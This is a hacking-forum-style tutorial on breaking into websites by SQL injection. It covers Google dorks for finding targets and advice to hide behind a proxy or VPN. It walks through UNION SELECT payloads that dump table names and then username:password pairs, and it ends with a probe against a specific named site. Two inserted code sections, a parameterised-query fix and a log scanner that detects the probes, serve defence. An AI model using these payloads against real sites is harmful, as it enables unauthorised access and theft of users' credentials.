This is a tutorial for people who would like to learn how to SQL inject into a site.
FAQ

What is a SQL Injection?
A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.

What can I do with an SQLi?
You can extract data such as passwords, usernames, locations, and also change the site, in which case you can put whatever you want on it.

Is it hard to do?
At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?
If you are not using a proxy or VPN (Virtual Private Network), then yes, there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.

What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable to injection.

Injection Tutorial

Step 1. Search Google by typing in a dork and clicking one of the websites that show up.

Common Dorks:
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=

Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection. So let's say we have a site like this:

http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number in order to get an error to show up on the page.

http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.
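Why the single quote in Step 2 produces that error, and what a developer has to change so that it does not, as an added example that is not part of the original post. The first function builds the query the way the vulnerable sites described here do, by pasting the id straight into the SQL text; the second validates the id as an integer and binds it as a parameter. The schema, rows and function names are constructed for this example, and sqlite3 stands in for MySQL, so the error text differs but the behaviour is the same. The probes it is run against are the ones this tutorial describes: the trailing quote, "order by N" (later Step 3) and a UNION with a matching column count (later Step 4).

```python
import sqlite3


def make_db():
    """Build a small in-memory database (constructed sample data, not a real site)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "Hello", "First post"), (2, "News", "Second post")])
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hash-of-admin-pw")])
    return conn


def vulnerable_lookup(conn, raw_id):
    """The pattern the tutorial relies on: the id from the URL becomes part of the SQL text.

    A trailing quote breaks the syntax (the Step 2 error), 'order by N' succeeds or fails
    depending on the real column count, and a UNION whose column count matches appends
    rows from any other table to the page's result set.
    """
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, raw_id):
    """Same lookup with two fixes: type validation and a bound parameter.

    int() rejects anything that is not a plain integer before any SQL is built, and the
    '?' placeholder makes the driver send the value separately from the statement, so
    the value can never change the structure of the query.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return conn.execute(sql, (article_id,)).fetchall()


def run_probe(lookup, raw_id):
    """Run one lookup against a fresh database; report rows or the exception class name."""
    conn = make_db()
    try:
        return ("rows", lookup(conn, raw_id))
    except Exception as exc:  # sqlite3.OperationalError for broken SQL, ValueError from int()
        return ("error", type(exc).__name__)
    finally:
        conn.close()


if __name__ == "__main__":
    probes = ["1", "1'", "1 order by 3", "1 order by 4",
              "-1 union select 1,username,password from users"]
    for name, lookup in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        for probe in probes:
            print(f"{name:10s} id={probe!r:50s} -> {run_probe(lookup, probe)}")
```

The hardened version raises the same ValueError for every malformed value, which the application should map to a generic 400 response; the database error text that the tutorial depends on in Steps 2 and 3 is never produced, let alone shown to the client.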
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this.

http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error. So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)
What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the URL and by using the union select function. After union select, write every number that leads up to the number of columns, separated by a comma. So here's how it should look:

http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, you should get one or more of the column numbers to show up on screen.

Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.

http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the URL with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).

For SQL Version 5 Injection:

Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already listed in one big table named information_schema. We use -- to end our command.

http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for is anything that might look like it contains the usernames and passwords of everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table.
We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time. After information_schema.columns, you need to tell the database which table you want to extract the columns from. So after .columns, you put where table_name=(name of table in hex form).

Now to convert the name of the table you're extracting from into hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign. So after all that it should look like this:

http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The names of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table you chose, it's time to extract the data. Once again, we will use the group_concat function. Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (the table name that you chose in TEXT form, not hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, your URL should look like this:

http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames of people should show up, then a colon, then the passwords of those usernames.

For SQL Version 4 Injection:

For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing something like user or admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow the same steps as for version 5 afterwards.
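Seen from the site owner's side, every step of the procedure above leaves a distinctive trace in the web server's access log: a quote appended to a numeric id, a run of "order by N" requests, then "union select", "@@version", "information_schema" and hex literals, usually all from one client within a few minutes. The following is an added example, not part of the original post, of a small log scanner that flags those indicators and counts hits per client address. The log lines are constructed for the example (addresses, paths and timestamps are invented) and are assumed to be in Apache combined format; the indicator list is derived from the steps in this tutorial, and the regular expressions are the author's choice, not a rule set from any product.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One indicator per probing step described in the tutorial. Values are matched
# after URL decoding, case folding and whitespace collapsing (see normalize()).
INDICATORS = [
    ("quote appended to numeric id", re.compile(r"^-?\d+\s*'")),
    ("order by column-count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("@@version read", re.compile(r"@@version")),
    ("information_schema read", re.compile(r"\binformation_schema\.")),
    ("group_concat call", re.compile(r"\bgroup_concat\s*\(")),
    ("hex literal", re.compile(r"\b0x[0-9a-f]{2,}\b")),
]

# Apache combined log: client, identd, user, [time], "METHOD URI PROTO", status, ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 412 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:57:30 +0000] "GET /index.php?id=1%20order%20by%2010 HTTP/1.1" 500 412 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:58:11 +0000] "GET /index.php?id=-1%20union%20select%201,@@version,3,4,5,6,7,8 HTTP/1.1" 200 2401 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:59:45 +0000] "GET /index.php?id=-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables-- HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:14:01:12 +0000] "GET /page.php?id=42&lang=en HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:14:02:40 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def normalize(value):
    """Fold case and collapse whitespace so encoded or mixed-case variants match alike."""
    return re.sub(r"\s+", " ", value).strip().lower()


def scan_query(uri):
    """Return the indicator labels triggered by any query-string value in uri."""
    hits = []
    # parse_qsl percent-decodes values and splits each pair on the first '=' only,
    # so 'where table_name=0x...' inside a value stays intact.
    for _name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        v = normalize(value)
        for label, pattern in INDICATORS:
            if pattern.search(v) and label not in hits:
                hits.append(label)
    return hits


def scan_log(lines):
    """Return (client_ip, status, uri, hits) for every line that triggers an indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _method, uri, status = m.groups()
        hits = scan_query(uri)
        if hits:
            findings.append((ip, int(status), uri, hits))
    return findings


def count_by_ip(findings):
    """Number of flagged requests per client address, for ranking and alerting."""
    counts = {}
    for ip, *_ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, status, uri, hits in found:
        print(f"{ip} {status} {uri}\n    {', '.join(hits)}")
    print("flagged requests per client:", count_by_ip(found))
```

Two points the sample shows: the benign "order by date" search is not flagged, because the indicator requires a numeric column position as in Step 3, and the 500 responses on the first two probes are the same database errors that the tutorial tells the reader to look for, so a 500 on a parameter that normally returns 200 is itself worth alerting on even before any UNION appears.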
Thank you for reading my tutorial. If you have any questions you can mail me at computerstudent@hackermail.com

http://huntingtop10.com/hunting-top-10-members.php?id=10'

Aamir_khan